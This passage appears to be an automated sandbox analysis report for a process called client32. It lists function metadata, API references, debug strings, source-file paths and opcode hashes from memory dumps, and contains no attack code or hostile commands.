e:\nsmsrc\nsn\300\cva_300f1\ctl32\uuencode.c, xrefs: 6CC75CE3

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: _malloc
String ID: buf$e:\nsmsrc\nsn\300\cva_300f1\ctl32\uuencode.c
API String ID: 1579825452-2410558694
Opcode ID: 241a2a018c065a9445a1c8e389320850334c83fd5bdcab04ad75672697ab50df
Instruction ID: 87f436f194379e1d32b2e80ee7b483341e957cb550c783daf9add29a89a822c8
Opcode Fuzzy Hash: 241a2a018c065a9445a1c8e389320850334c83fd5bdcab04ad75672697ab50df
Instruction Fuzzy Hash: 71213AA2D402411FE3200A795C946EA3B94CB662387380776E9BAC77C2F625D94F4361

Function 110F9200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

std::exception::exception.LIBCMT ref: 110F9259
__CxxThrowException@8.LIBCMT ref: 110F926E

Strings

SERVICE_STOPPED, xrefs: 110F928B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: SERVICE_STOPPED
API String ID: 1338273076-2952185856
Opcode ID: 7863cd1019f7c507a980daf9cc18c30ca2e51dd9cb744989036ea746dc30ae22
Instruction ID: 861a20010b97cda9c46bc73d43b4561baa07196ef4a1bd06c3ab550d4ae6c7c8
Opcode Fuzzy Hash: 7863cd1019f7c507a980daf9cc18c30ca2e51dd9cb744989036ea746dc30ae22
Instruction Fuzzy Hash: 0D21DEBAA00205ABC314DFA8EC40EDBF7E8AF94750B00852AE95987740EA71FA50C7D1

Function 1100F210 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F22B

Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E

std::_Xinvalid_argument.LIBCPMT ref: 1100F242

Strings

string too long, xrefs: 1100F226, 1100F23D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: b3d1314d947281a894f8efd54b95a9e12544f938a1616c6a14e75e78f85f9d23
Instruction ID: 4ae5dbe98dc33b486374ed3c743d77287fa05e59300f19889e7a737380275ccf
Opcode Fuzzy Hash: b3d1314d947281a894f8efd54b95a9e12544f938a1616c6a14e75e78f85f9d23
Instruction Fuzzy Hash: DC11D6377046108BF321D9ADE880BAAF7D9EFE57B4F20065FE59187640C7A1A84087A2

Function 110D55B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A

OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,2F623E72,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A

Strings

NsAppSystem::CNsAsException::CNsAsException, xrefs: 110D560D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DebugOutputString$Xinvalid_argumentstd::_
String ID: NsAppSystem::CNsAsException::CNsAsException
API String ID: 3978508687-500537696
Opcode ID: 1850ce06997195f9aef3bc43c98f9b5799eefcc8e6cd501f640f2ee05f4afc4e
Instruction ID: 8837671011e457aa4c11cfd1fd5c4e9a0250d23fcc6e96c43e9b8becd046c5d2
Opcode Fuzzy Hash: 1850ce06997195f9aef3bc43c98f9b5799eefcc8e6cd501f640f2ee05f4afc4e
Instruction Fuzzy Hash: 8321BF75D04349AFDB00DFA9C880BDEFBB8EF59328F10416ED82167281DB756A04CBA1

Function 11131740 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 11131782

Strings

..\ctl32\util.cpp, xrefs: 1113179E
p || !"<2Kb mem", xrefs: 111317A3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy
String ID: ..\ctl32\util.cpp$p || !"<2Kb mem"
API String ID: 2961919466-1642919599
Opcode ID: 07288aab24d8dd20403dc9fb53ff62a4c8902d348d34fad18246858022f9ba7c
Instruction ID: a3632db9a93471b5910d5886b4d3df24aec854f6ed9a85d08698d96db66754df
Opcode Fuzzy Hash: 07288aab24d8dd20403dc9fb53ff62a4c8902d348d34fad18246858022f9ba7c
Instruction Fuzzy Hash: 6301D63F7046552B97014959BD84EE6BBA8DBC1279B084131FE0C9B105D622E90842E1

Function 1105F6C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,2F623E72,?,?,00000000,00000000,1116FF28,000000FF,?,1106C1DF,00000000), ref: 1105F71E

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

..\ctl32\Connect.cpp, xrefs: 1105F730
event, xrefs: 1105F735

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateErrorEventExitLastMessageProcesswsprintf
String ID: ..\ctl32\Connect.cpp$event
API String ID: 3621156866-397488498
Opcode ID: fd3e71d5bf18a46b3dfe931f6bc4de9dd8d9b23747157b2efdc3bbba90cd4121
Instruction ID: 7f4e7f88dac8734bf71c11550bb5f7ee8dc05d43cc50a9f1029ba97a1904f2d0
Opcode Fuzzy Hash: fd3e71d5bf18a46b3dfe931f6bc4de9dd8d9b23747157b2efdc3bbba90cd4121
Instruction Fuzzy Hash: 58117C75A04715AFD720CF5ADC45B9AFBF8EB09B14F008A2EF81197780E7B5A5048B91

Function 1108F080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1108F095

Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E

_memmove.LIBCMT ref: 1108F0C4

Strings

vector<T> too long, xrefs: 1108F090

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 6f0b2e1c205bbd2c96d839bee56b005472a4b14bbc734a29f06d1c48f80613f6
Instruction ID: a6d9f17f4f5abecd3a3e42e3327a60068f9e3e230c18d666d12c29c30de67088
Opcode Fuzzy Hash: 6f0b2e1c205bbd2c96d839bee56b005472a4b14bbc734a29f06d1c48f80613f6
Instruction Fuzzy Hash: 6001B5B5E042069FC734CEB9DC80CA7B7D9EBD4318714CA2DE55A87644EA70F801CBA1

Function 1100B560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

Error. NULL capbuf, xrefs: 1100B571
Error. preventing capbuf overflow, xrefs: 1100B596

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: Error. NULL capbuf$Error. preventing capbuf overflow
API String ID: 0-3856134272
Opcode ID: b51532faca43ebac7e18a9a5a26819066dfd90f60a6994718c66c64743f8ecf5
Instruction ID: 418a5b702e0b0712c65a1007775ff8f326adea187fe23ba1f0a502aa42cbf0d9
Opcode Fuzzy Hash: b51532faca43ebac7e18a9a5a26819066dfd90f60a6994718c66c64743f8ecf5
Instruction Fuzzy Hash: 5901DBBAE00A0597D610CF55F840ACBB398DBC037DF04897AEA1E97201D531F59187E2

Function 110C57C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 110C57DA

Strings

*this==pszSrc, xrefs: 110C581F
..\CTL32\NSMString.cpp, xrefs: 110C581A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __strdup
String ID: *this==pszSrc$..\CTL32\NSMString.cpp
API String ID: 838363481-1175285396
Opcode ID: e4453229906218e14064e09eb244ec75da78adacfa0f2a1d896df9b7f8fe9b5c
Instruction ID: 977ead267f76f83ff3eab1d3ecdd9d4c93443979ce516d127c4424599980823c
Opcode Fuzzy Hash: e4453229906218e14064e09eb244ec75da78adacfa0f2a1d896df9b7f8fe9b5c
Instruction Fuzzy Hash: 5FF02D79F007065BC301DE19AC04B9BF7E9AF51658B1484B6ECA9D7311E531A4058BD1

Function 11083170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 11102BC0: GetCurrentThreadId.KERNEL32 ref: 11102BCE
Part of subcall function 11102BC0: EnterCriticalSection.KERNEL32(00000000,75A73760,00000000,111DBD28,?,110C3135,00000000,75A73760), ref: 11102BD8
Part of subcall function 11102BC0: LeaveCriticalSection.KERNEL32(00000000,75A8A1D0,00000000,?,110C3135,00000000,75A73760), ref: 11102BF8

InterlockedIncrement.KERNEL32(00000000), ref: 110831C1

Part of subcall function 11103060: GetCurrentThreadId.KERNEL32 ref: 11103089
Part of subcall function 11103060: EnterCriticalSection.KERNEL32(00000000,?,1106B5D7,00000001,?), ref: 11103096
Part of subcall function 11103060: LeaveCriticalSection.KERNEL32(00000000,?,?,?,1106B5D7), ref: 111030E2

Part of subcall function 11083090: InterlockedDecrement.KERNEL32(00000000), ref: 11083091

Strings

tdata, xrefs: 110831B3
..\ctl32\Errorhan.cpp, xrefs: 110831AE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CurrentEnterInterlockedLeaveThread$DecrementIncrement
String ID: ..\ctl32\Errorhan.cpp$tdata
API String ID: 572542348-657756363
Opcode ID: f4e42414f0fbdbc5b375dfe8d0a8774ab02788612ae6362accde8ab73a6fb4c6
Instruction ID: fed0740ed2e363c3bace71a798bb0b99693e64dd8fd0b9732b9dedd91c868084
Opcode Fuzzy Hash: f4e42414f0fbdbc5b375dfe8d0a8774ab02788612ae6362accde8ab73a6fb4c6
Instruction Fuzzy Hash: 06E0ED3AE0DA3F27D516A6A54C28BCFFB8A1B41A6DB404014F9286F640FC80A80082F6

Function 11095740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 11095754
SetLastError.KERNEL32(00000078,00000000,?,110965DC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109577D

Strings

ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109574E

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
API String ID: 199729137-262600717
Opcode ID: 7296345c72dc160559074f0e23efd7321d78c34b523c223cec433581c304b291
Instruction ID: f0e677052f352e1d491147569a4aaef78e9149aea0f3838322468369201922be
Opcode Fuzzy Hash: 7296345c72dc160559074f0e23efd7321d78c34b523c223cec433581c304b291
Instruction Fuzzy Hash: 1EF08276A40228AFC320CF94E844E9BB7E8EF48721F00451AF95AD7240D671E910CBB0

Function 11149950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32(75A71A30), ref: 11149953

Part of subcall function 111028F0: _malloc.LIBCMT ref: 111028F9
Part of subcall function 111028F0: _memset.LIBCMT ref: 11102922

GetWindowTextA.USER32(75A71A30,00000000,00000001), ref: 1114996D

Strings

..., xrefs: 1114997B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: TextWindow$Length_malloc_memset
String ID: ...
API String ID: 2795061067-1685331755
Opcode ID: c28af5b66c56861c58386236f2d9b2babd1ffea7304133fadfb457d98e0e8474
Instruction ID: 5973807bdfb4d5bf786d2ec1048b58e7df4675e95d19225fcb855333fddf0d7a
Opcode Fuzzy Hash: c28af5b66c56861c58386236f2d9b2babd1ffea7304133fadfb457d98e0e8474
Instruction Fuzzy Hash: 3DE0ED3A9002675FC30146299C489CBFB9DABCA208B048420E495C7205EA20E90A87B0

Function 1102F9E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1102F9F4
SetLastError.KERNEL32(00000078), ref: 1102FA15

Strings

ProcessIdToSessionId, xrefs: 1102F9EE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: ProcessIdToSessionId
API String ID: 199729137-2164408197
